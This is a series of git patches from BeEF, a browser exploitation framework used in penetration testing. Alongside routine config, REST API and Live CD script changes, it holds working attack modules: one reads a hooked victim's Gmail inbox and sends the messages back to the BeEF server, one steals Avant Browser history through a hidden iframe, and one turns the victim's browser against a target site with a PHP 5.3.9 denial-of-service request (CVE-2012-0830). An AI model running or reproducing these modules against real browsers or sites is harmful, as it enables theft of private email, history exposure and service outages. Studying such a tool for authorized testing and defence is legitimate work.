 to add mysql/postgres dependencies if switching database drivers.

---
 config.yaml | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/config.yaml b/config.yaml
index b30b4b245..567ab7b05 100644
--- a/config.yaml
+++ b/config.yaml
@@ -59,6 +59,12 @@ beef:
         # README.databases file
 
         # supported DBs: sqlite, mysql, postgres
+        # NOTE: you must change the Gemfile adding a gem require line like:
+        #   gem "dm-postgres-adapter"
+        # or
+        #   gem "dm-mysql-adapter"
+        # if you want to switch drivers from sqlite to postgres (or mysql).
+        # Finally, run a 'bundle install' command and start BeEF.
         driver: "sqlite"
 
         # db_file is only used for sqlite

From b050af529f8527abe17385e9283a57bff2a129ea Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 25 Nov 2012 11:52:54 +0000
Subject: [PATCH 111/397] Removed console.log from read_gmail module. Some
 browser do not support that.

---
 modules/misc/read_gmail/command.js | 90 +++++++++++++++---------------
 1 file changed, 44 insertions(+), 46 deletions(-)

diff --git a/modules/misc/read_gmail/command.js b/modules/misc/read_gmail/command.js
index b6276b213..680c50088 100644
--- a/modules/misc/read_gmail/command.js
+++ b/modules/misc/read_gmail/command.js
@@ -1,46 +1,44 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-beef.execute(function() {
-	var result; 
-
-	try { 
-		x = new XMLHttpRequest();
-		x.open('get', 'https://mail.google.com/mail/feed/atom', false);
-		x.send();
-
-		str = x.responseText; var re = /message_id=([A-Z,a-z,0-9]*)/g;
-		var match;
-		while(match = re.exec(str)) {
-		    console.log(match[1])
-			x = new XMLHttpRequest();
-			x.open('get', 'https://mail.google.com/mail/u/0/h/?&v=om&th='+match[1]+'&f=1&f=1', false);
-			x.send();
-			result += x.responseText;
-		}
-  	
-	} catch(e) { 
-		for(var n in e) 
-			result+= n + " " + e[n] + "\n"; 
-	} 
-	console.log('sending');
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
-});
-
-
-
-
-
- 
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+	var result; 
+
+	try { 
+		x = new XMLHttpRequest();
+		x.open('get', 'https://mail.google.com/mail/feed/atom', false);
+		x.send();
+
+		str = x.responseText; var re = /message_id=([A-Z,a-z,0-9]*)/g;
+		var match;
+		while(match = re.exec(str)) {
+			x = new XMLHttpRequest();
+			x.open('get', 'https://mail.google.com/mail/u/0/h/?&v=om&th='+match[1]+'&f=1&f=1', false);
+			x.send();
+			result += x.responseText;
+		}
+  	
+	} catch(e) { 
+		for(var n in e) 
+			result+= n + " " + e[n] + "\n"; 
+	} 
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result);
+});
+
+
+
+
+
+ 

From da089110803b9a11dd288111664a73a317efc57a Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 25 Nov 2012 13:47:29 +0000
Subject: [PATCH 112/397] Added '/multi_module' RESTful API call to send
 multiple modules at once to a single browser.

---
 core/main/rest/handlers/modules.rb | 70 +++++++++++++++++++++++++++++-
 1 file changed, 68 insertions(+), 2 deletions(-)

diff --git a/core/main/rest/handlers/modules.rb b/core/main/rest/handlers/modules.rb
index 14ad22e4b..44384137e 100644
--- a/core/main/rest/handlers/modules.rb
+++ b/core/main/rest/handlers/modules.rb
@@ -157,7 +157,8 @@ module BeEF
 
         #
         #@note Fire a new command module to multiple hooked browsers.
-        # Returns the command IDs of the launched modules, or 0 if firing got issues.
+        # Returns the command IDs of the launched module, or 0 if firing got issues.
+        #
         # POST request body example (for modules that don't need parameters, just remove "mod_params")
         #  {
         #    "mod_id":1,
@@ -166,12 +167,15 @@ module BeEF
         #     },
         #    "hb_ids":[1,2]
         #   }
+        #
         # response example: {"1":16,"2":17}
+        #
         # curl example (alert module with custom text, 2 hooked browsers)):
+        #
         #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mod_id":110,"mod_params":{"text":"mucci?"},"hb_ids":[1,2]}'
         #-X POST http://127.0.0.1:3000/api/modules/multi?token=2316d82702b83a293e2d46a0886a003a6be0a633
         #
-        post '/multi' do
+        post '/multi_browser' do
           request.body.rewind
           begin
             body = JSON.parse request.body.read
@@ -204,6 +208,68 @@ module BeEF
             error 400 # Bad Request
           end
         end
+
+        # @note Fire multiple command modules to a single hooked browser.
+        # Returns the command IDs of the launched modules, or 0 if firing got issues.
+        #
+        # POST request body example (for modules that don't need parameters, just pass an empty JSON object like {} )
+        #{ "hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
+        #    "modules": [
+        #        {    # test_return_long_string module with custom input
+        #             "mod_id":99,
+        #              "mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]
+        #        },
+        #        {   # prompt_dialog module with custom input
+        #            "mod_id":116,
+        #            "mod_input":[{"question":"hooked?"}]
+        #        },
+        #        {   # alert_dialog module without input (using default input, if any)
+        #            "mod_id":128,
+        #            "mod_input":[]
+        #        }
+        #    ]
+        #  }
+        # response example: {"99":7,"116":8,"128":0} # <- This means the alert_dialog had issues (see return value 0)
+        #
+        # curl example (test_return_long_string and prompt_dialog module with custom inputs)):
+        #
+        #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj",
+        # "modules":[{"mod_id":99,"mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]},{"mod_id":116,"mod_input":[{"question":"hooked?"}]},{"mod_id":128,"mod_input":[]}]}'
+        #  -X POST http://127.0.0.1:3000/api/modules/multi_module?token=e640483ae9bca2eb904f003f27dd4bc83936eb92
+        #
+        post '/multi_module' do
+          request.body.rewind
+          begin
+            body = JSON.parse request.body.read
+            hb = BeEF::Core::Models::HookedBrowser.first(:session => body["hb"])
+            error 401 unless hb != nil
+
+            results = Hash.new
+            if body["modules"] != nil
+              body["modules"].each{|mod|
+                mod_id = mod["mod_id"]
+                mod_k = BeEF::Module.get_key_by_database_id mod["mod_id"]
+                if mod_k == nil
+                  results[mod_id] = 0
+                  next
+                else
+                  mod_params = []
+                  mod["mod_input"].each{|input|
+                    input.each{|k,v|
+                      mod_params.push({'name' => k, 'value' => v})
+                    }
+                  }
+                  cmd_id = BeEF::Module.execute(mod_k, hb.session, mod_params)
+                  results[mod_id] = cmd_id
+                end
+              }
+            end
+            results.to_json
+          rescue Exception => e
+            print_error "Invalid JSON input passed to endpoint /api/modules/multi"
+            error 400 # Bad Request
+          end
+        end
       end
     end
   end

From 3152f41a185217e7d64af5c9061ee3c0cc78c275 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 26 Nov 2012 02:50:27 +1030
Subject: [PATCH 113/397] Add `beef.net.cors.request`

  Returns a response object with HTTP status, headers and body

Add 'Test CORS Request' debug module
---
 core/main/client/net/cors.js                | 77 +++++++++++++++++++++
 core/main/handlers/modules/beefjs.rb        | 12 ++--
 modules/debug/test_cors_request/command.js  | 16 +++++
 modules/debug/test_cors_request/config.yaml | 15 ++++
 modules/debug/test_cors_request/module.rb   | 23 ++++++
 5 files changed, 138 insertions(+), 5 deletions(-)
 create mode 100644 core/main/client/net/cors.js
 create mode 100644 modules/debug/test_cors_request/command.js
 create mode 100644 modules/debug/test_cors_request/config.yaml
 create mode 100644 modules/debug/test_cors_request/module.rb

diff --git a/core/main/client/net/cors.js b/core/main/client/net/cors.js
new file mode 100644
index 000000000..01cf86008
--- /dev/null
+++ b/core/main/client/net/cors.js
@@ -0,0 +1,77 @@
+beef.net.cors = {
+
+  handler: "cors",
+
+    /**
+     * Response Object - used in the beef.net.request callback
+     */
+    response:function () {
+        this.status  = null;      // 500, 404, 200, 302, etc
+        this.headers = null;      // full response headers
+        this.body    = null;      // full response body
+    },
+
+    /**
+     * Make a cross-domain request using CORS
+     *
+     * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
+     * @param url {String} url
+     * @param data {String} request body
+     * @param callback {Function} function to callback on completion
+     */
+    request: function(method, url, data, callback) {
+
+    var xhr;
+    var response = new this.response;
+
+    if (XMLHttpRequest) {
+        xhr = new XMLHttpRequest();
+
+        if ('withCredentials' in xhr) {
+            xhr.open(method, url, true);
+            xhr.onerror = function() {
+            };
+            xhr.onreadystatechange = function() {
+                if (xhr.readyState === 4) {
+                    response.headers = this.getAllResponseHeaders()
+                    response.body    = this.responseText;
+                    response.status  = this.status;
+                    if (!!callback) {
+                        if (!!response) {
+                            callback(response);
+                        } else { 
+                            callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                        }
+                    }
+                }
+            };
+            xhr.send(data);
+        }
+    } else if (typeof XDomainRequest != "undefined") {
+        xhr = new XDomainRequest();
+        xhr.open(method, url);
+        xhr.onerror = function() {
+        };
+        xhr.onload = function() {
+            response.headers = this.getAllResponseHeaders()
+            response.body    = this.responseText;
+            response.status  = this.status;
+            if (!!callback) {
+                if (!!response) {
+                    callback(response);
+                } else {
+                    callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                }
+            }
+        };
+        xhr.send(data);
+    } else {
+        if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
+    }
+
+    }
+
+};
+
+beef.regCmp('beef.net.cors');
+
diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb
index 41b5ac719..e36fedd7c 100644
--- a/core/main/handlers/modules/beefjs.rb
+++ b/core/main/handlers/modules/beefjs.rb
@@ -23,14 +23,16 @@ module BeEF
             # @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
             ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
 
+            # @note BeEF libraries: need Eruby evaluation and obfuscation
+            beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
             # @note Load websocket library only if WS server is enabled in config.yaml
-            if config.get("beef.http.websocket.enable") == false
-              # @note BeEF libraries: need Eruby evaluation and obfuscation                                                                                                                           #antisnatchor: leave timeout.js as the last one!
-              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js are.js timeout.js)
-            else                                                                                                                                                                                                   #antisnatchor: leave timeout.js as the last one!
-              beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js are.js timeout.js)
+            if config.get("beef.http.websocket.enable") == true
+              beef_js_sub_files << "websocket.js"
             end
 
+            # @note antisnatchor: leave timeout.js as the last one!
+            beef_js_sub_files << "timeout.js"
+
             ext_js_to_obfuscate = ''
             ext_js_to_not_obfuscate = ''
 
diff --git a/modules/debug/test_cors_request/command.js b/modules/debug/test_cors_request/command.js
new file mode 100644
index 000000000..bfe5abc2d
--- /dev/null
+++ b/modules/debug/test_cors_request/command.js
@@ -0,0 +1,16 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var method = "<%= @method %>";
+	var url    = "<%= @url %>";
+	var data   = "<%= @data %>";
+
+	beef.net.cors.request(method, url, data, function(response) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "response="+JSON.stringify(response)); });
+
+});
+
diff --git a/modules/debug/test_cors_request/config.yaml b/modules/debug/test_cors_request/config.yaml
new file mode 100644
index 000000000..19e45a183
--- /dev/null
+++ b/modules/debug/test_cors_request/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_cors_request:
+            enable: true
+            category: "Debug"
+            name: "Test CORS Request"
+            description: "Test the beef.net.cors.request function by retrieving a URL."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/debug/test_cors_request/module.rb b/modules/debug/test_cors_request/module.rb
new file mode 100644
index 000000000..7ab7f3db9
--- /dev/null
+++ b/modules/debug/test_cors_request/module.rb
@@ -0,0 +1,23 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_cors_request < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['response'] = @datastore['response']
+    save content
+  end
+
+  def self.options
+
+    return [
+        {'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'POST' },
+        {'name' => 'url',    'ui_label' =>'URL',    'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' },
+        {'name' => 'data',   'ui_label' =>'Data',   'type' => 'text', 'width' => '400px', 'value' => 'postdata' },
+    ]
+  end
+
+end

From 9083586135504fd263640fc1f15a07222c08159e Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 26 Nov 2012 16:38:07 +1030
Subject: [PATCH 114/397] Updated supported browser list for CORS debug module

---
 modules/debug/test_cors_request/config.yaml | 13 +++++++++++++
 modules/debug/test_cors_request/module.rb   |  2 +-
 2 files changed, 14 insertions(+), 1 deletion(-)

diff --git a/modules/debug/test_cors_request/config.yaml b/modules/debug/test_cors_request/config.yaml
index 19e45a183..767060493 100644
--- a/modules/debug/test_cors_request/config.yaml
+++ b/modules/debug/test_cors_request/config.yaml
@@ -13,3 +13,16 @@ beef:
             authors: ["bcoles"]
             target:
                 working: ["ALL"]
+                not_working:
+                    IE:
+                        min_ver: 6
+                        max_ver: 7
+                    O:
+                        min_ver: 1
+                        max_ver: 11
+                    C:
+                        min_ver: 1
+                        max_ver: 2
+                    S:
+                        min_ver: 1
+                        max_ver: 3
diff --git a/modules/debug/test_cors_request/module.rb b/modules/debug/test_cors_request/module.rb
index 7ab7f3db9..98bb97973 100644
--- a/modules/debug/test_cors_request/module.rb
+++ b/modules/debug/test_cors_request/module.rb
@@ -14,7 +14,7 @@ class Test_cors_request < BeEF::Core::Command
   def self.options
 
     return [
-        {'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'POST' },
+        {'name' => 'method', 'ui_label' =>'Method', 'type' => 'text', 'width' => '400px', 'value' => 'GET' },
         {'name' => 'url',    'ui_label' =>'URL',    'type' => 'text', 'width' => '400px', 'value' => 'http://graph.facebook.com/fql?q=SELECT%20url,total_count%20FROM%20link_stat%20WHERE%20url=%27http://beefproject.com/%27' },
         {'name' => 'data',   'ui_label' =>'Data',   'type' => 'text', 'width' => '400px', 'value' => 'postdata' },
     ]

From 9546e881134119ae3d6413d59fa378ed2f6f455a Mon Sep 17 00:00:00 2001
From: Roberto Suggi Liverani <robertosl81@gmail.com>
Date: Wed, 28 Nov 2012 14:11:04 +1300
Subject: [PATCH 115/397] Avant Browser History Stealing

Avant Browser History Stealing module - Advisory:
http://blog.malerisch.net/2012/11/avant-browser-same-of-origin-policy.html
---
 .../exploits/avant_steal_history/command.js   | 51 +++++++++++++++++++
 .../exploits/avant_steal_history/config.yaml  | 25 +++++++++
 .../exploits/avant_steal_history/module.rb    | 33 ++++++++++++
 3 files changed, 109 insertions(+)
 create mode 100644 modules/exploits/avant_steal_history/command.js
 create mode 100644 modules/exploits/avant_steal_history/config.yaml
 create mode 100644 modules/exploits/avant_steal_history/module.rb

diff --git a/modules/exploits/avant_steal_history/command.js b/modules/exploits/avant_steal_history/command.js
new file mode 100644
index 000000000..6eb89b905
--- /dev/null
+++ b/modules/exploits/avant_steal_history/command.js
@@ -0,0 +1,51 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	
+
+	var avant_iframe = document.createElement("iframe");
+	//var avant_iframe = beef.dom.createInvisibleIframe();
+	avant_iframe.setAttribute('src', "browser:home");
+	avant_iframe.setAttribute('name','test2');
+	avant_iframe.setAttribute('width','0');
+	avant_iframe.setAttribute('heigth','0');
+	avant_iframe.setAttribute('scrolling','no');
+
+	document.body.appendChild(avant_iframe);
+
+	var vstr = {value: ""};
+
+	if(window['test2'].navigator) {
+	//This works if FF is the rendering engine
+	window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
+
+	}
+	else {
+	// this works if Chrome is the rendering engine
+	//window['test2'].AFRunCommand(60003, vstr);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");	
+
+	}
+	
+
+	
+
+	
+
+});
+
diff --git a/modules/exploits/avant_steal_history/config.yaml b/modules/exploits/avant_steal_history/config.yaml
new file mode 100644
index 000000000..1121f0db2
--- /dev/null
+++ b/modules/exploits/avant_steal_history/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        avant_steal_history:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "Avant Browser History Stealing"
+            description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
+            authors: ["Roberto Suggi Liverani"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/avant_steal_history/module.rb b/modules/exploits/avant_steal_history/module.rb
new file mode 100644
index 000000000..7a819fa5e
--- /dev/null
+++ b/modules/exploits/avant_steal_history/module.rb
@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Avant_steal_history < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		
+
+		return [
+			{'name' => 'cId', 'ui_label' => 'Command ID:', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 75532ffe44efbc3235c4f6e6d953226edf82c073 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 29 Nov 2012 18:34:07 +1030
Subject: [PATCH 116/397] Add PHP 5.3.9 DoS (CVE-2012-0830) module

Has not been tested
---
 modules/exploits/php-5.3.9-dos/command.js  | 52 ++++++++++++++++++++++
 modules/exploits/php-5.3.9-dos/config.yaml | 15 +++++++
 modules/exploits/php-5.3.9-dos/module.rb   | 21 +++++++++
 3 files changed, 88 insertions(+)
 create mode 100644 modules/exploits/php-5.3.9-dos/command.js
 create mode 100644 modules/exploits/php-5.3.9-dos/config.yaml
 create mode 100644 modules/exploits/php-5.3.9-dos/module.rb

diff --git a/modules/exploits/php-5.3.9-dos/command.js b/modules/exploits/php-5.3.9-dos/command.js
new file mode 100644
index 000000000..6f03ea12f
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/command.js
@@ -0,0 +1,52 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
+// PoC written by Paul Westin
+// PoC ported to BeEF by bcoles
+// Bug discovered by Stefan Esser (@i0n1c)
+// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
+
+// Generate 1000 normal keys and one array
+function createEvilObj () {
+    var evil_obj = {};
+    for (var i = 0; i < 1001; i++) {
+        evil_obj[i] = 1;
+    }
+    evil_obj['kill[]'] = 'kill';
+    return evil_obj;
+}
+
+// Serialize Javascript object into POST data
+function serializeObj (obj) {
+    var str = [];
+    for(var p in obj) {
+        str.push(p + "=" + obj[p]);
+    }
+    return str.join("&");
+}
+
+// Run attack
+function attackSite (target_url) {
+    var bad = serializeObj(createEvilObj());
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", target_url, true);
+    xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
+    xhr.setRequestHeader('Content-Length', bad.length);
+    xhr.send(bad);
+}
+
+try {
+    attackSite("<%= @url %>");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent");
+} catch (e) {
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString());
+}
+
+});
+
diff --git a/modules/exploits/php-5.3.9-dos/config.yaml b/modules/exploits/php-5.3.9-dos/config.yaml
new file mode 100644
index 000000000..3617825ba
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        php_dos:
+            enable: true
+            category: "Exploits"
+            name: "PHP 5.3.9 DoS"
+            description: "This module uses the zombie browser to exploit a denial of service bug in PHP 5.3.9 (<a href='http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830'>CVE-2012-0830</a>).<br/><br/>For more information, see <a href='http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/'>http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/</a>."
+            authors: ["bcoles", "Paul Westin", "Stefan Esser"]
+            target:
+                unknown: ["ALL"]
diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb
new file mode 100644
index 000000000..6044f3550
--- /dev/null
+++ b/modules/exploits/php-5.3.9-dos/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Php_dos < BeEF::Core::Command
+
+	def self.options
+		return [
+			{'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'value' =>'http://example.com/index.php', 'width' => '400px', 'height' => '50px'}
+		]
+	end
+
+	def post_execute
+		content = {}
+		content['result'] = @datastore['result']
+		save content
+	end
+
+end
+

From d3cb14b1ad981784543ae1818c39c53748b98cc7 Mon Sep 17 00:00:00 2001
From: ben-waugh <ben@delonge.com.au>
Date: Fri, 7 Dec 2012 10:39:05 +1000
Subject: [PATCH 117/397] Added Live CD Login Script

Fixes #775 #766
---
 BeEFLive.sh | 110 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 110 insertions(+)
 create mode 100644 BeEFLive.sh

diff --git a/BeEFLive.sh b/BeEFLive.sh
new file mode 100644
index 000000000..c5296aeea
--- /dev/null
+++ b/BeEFLive.sh
@@ -0,0 +1,110 @@
+#!/bin/bash
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'home/beef/doc/COPYING' for copying permission
+#
+
+   
+#
+# This is the auto startup script for the BeEF Live CD. 
+# IT SHOULD ONLY BE RUN ON THE LIVE CD
+# Download LiveCD here: https://github.com/beefproject/beef/downloads
+#
+# This script contains a few fixes to make beef play nicely with the way  
+# remastersys creates the live cd distributable as well as generating host keys  
+# to enable SSH etc. The script also make it easy for the user to update/start 
+# the BeEF server
+#
+clear
+echo "======================================"
+echo "          BeEF Live CD   "
+echo "======================================"
+echo ""
+echo "Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net"
+echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
+echo "See the file 'home/beef/doc/COPYING' for copying permission"
+echo ""
+
+echo "Welcome to the BeEF Live CD" 
+echo "" 
+echo ""
+
+#
+# Check for SSH Host Keys - if they do not exist ask user if they should be 
+# created (remastersys has a habit of deleting them during Live CD Creation)
+#
+f1="/etc/ssh/ssh_host_rsa_key"
+if [ -f $f1 ]
+then
+ echo ""
+else 
+	echo -n "Would you like to enable ssh (y/N)? "
+	read var
+	
+	if [ $var = "y" ] ; then
+		 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
+		 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
+		 echo ""
+		 echo "Please provide a password for ssh user: beef"
+		 sudo passwd beef
+		 echo "ssh enabled"
+	fi
+fi
+echo ""
+
+#
+# Prompt the user if they would like to update BeEF and 
+# other components installed (such as sqlmap and msf)
+#
+echo -n "Check and install updates for beef (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+	 cd /opt/beef
+	 git stash
+	 git pull
+fi
+echo ""
+
+echo -n "Check and install updates for mfs and sqlmap (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+ 	 cd /opt/sqlmap
+ 	 git stash
+	 git pull
+	 cd /opt/metasploit-framework
+	 git stash
+	 git pull
+fi
+ 
+ 
+#
+# Create a shortcut in the users home folder to BeEF, MSF and sqlmap (if they do 
+# not yet exist)
+#
+f1="beef"
+if [ -f $f1 ] ; then
+	echo ""
+else
+	ln -s /opt/beef/ beef
+	ln -s /opt/metasploit-framework/ msf
+	ln -s /opt/sqlmap/ sqlmap
+fi
+
+#
+# Prompt the user if they would like start beef
+#
+echo -n "Start BeEF (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+	echo ""
+	echo "Starting BeEF..";
+	
+	cd /opt/beef
+	ruby beef -x
+fi
+
+

From acb09efd32812e001ac8aafc5cbc459f87f42051 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 10 Dec 2012 23:59:45 +1030
Subject: [PATCH 118/397] Fixed a few typos in BeEFLive.sh

Moved avant_steal_history module to 'browser' category
---
 BeEFLive.sh                                      | 16 ++++++++--------
 .../avant_steal_history/command.js               |  0
 .../avant_steal_history/config.yaml              |  4 ++--
 .../avant_steal_history/module.rb                |  0
 4 files changed, 10 insertions(+), 10 deletions(-)
 rename modules/{exploits => browser}/avant_steal_history/command.js (100%)
 rename modules/{exploits => browser}/avant_steal_history/config.yaml (90%)
 rename modules/{exploits => browser}/avant_steal_history/module.rb (100%)

diff --git a/BeEFLive.sh b/BeEFLive.sh
index c5296aeea..14fedd039 100644
--- a/BeEFLive.sh
+++ b/BeEFLive.sh
@@ -11,8 +11,8 @@
 # IT SHOULD ONLY BE RUN ON THE LIVE CD
 # Download LiveCD here: https://github.com/beefproject/beef/downloads
 #
-# This script contains a few fixes to make beef play nicely with the way  
-# remastersys creates the live cd distributable as well as generating host keys  
+# This script contains a few fixes to make BeEF play nicely with the way  
+# remastersys creates the live cd distributable as well as generating host keys 
 # to enable SSH etc. The script also make it easy for the user to update/start 
 # the BeEF server
 #
@@ -37,7 +37,7 @@ echo ""
 f1="/etc/ssh/ssh_host_rsa_key"
 if [ -f $f1 ]
 then
- echo ""
+	echo ""
 else 
 	echo -n "Would you like to enable ssh (y/N)? "
 	read var
@@ -57,7 +57,7 @@ echo ""
 # Prompt the user if they would like to update BeEF and 
 # other components installed (such as sqlmap and msf)
 #
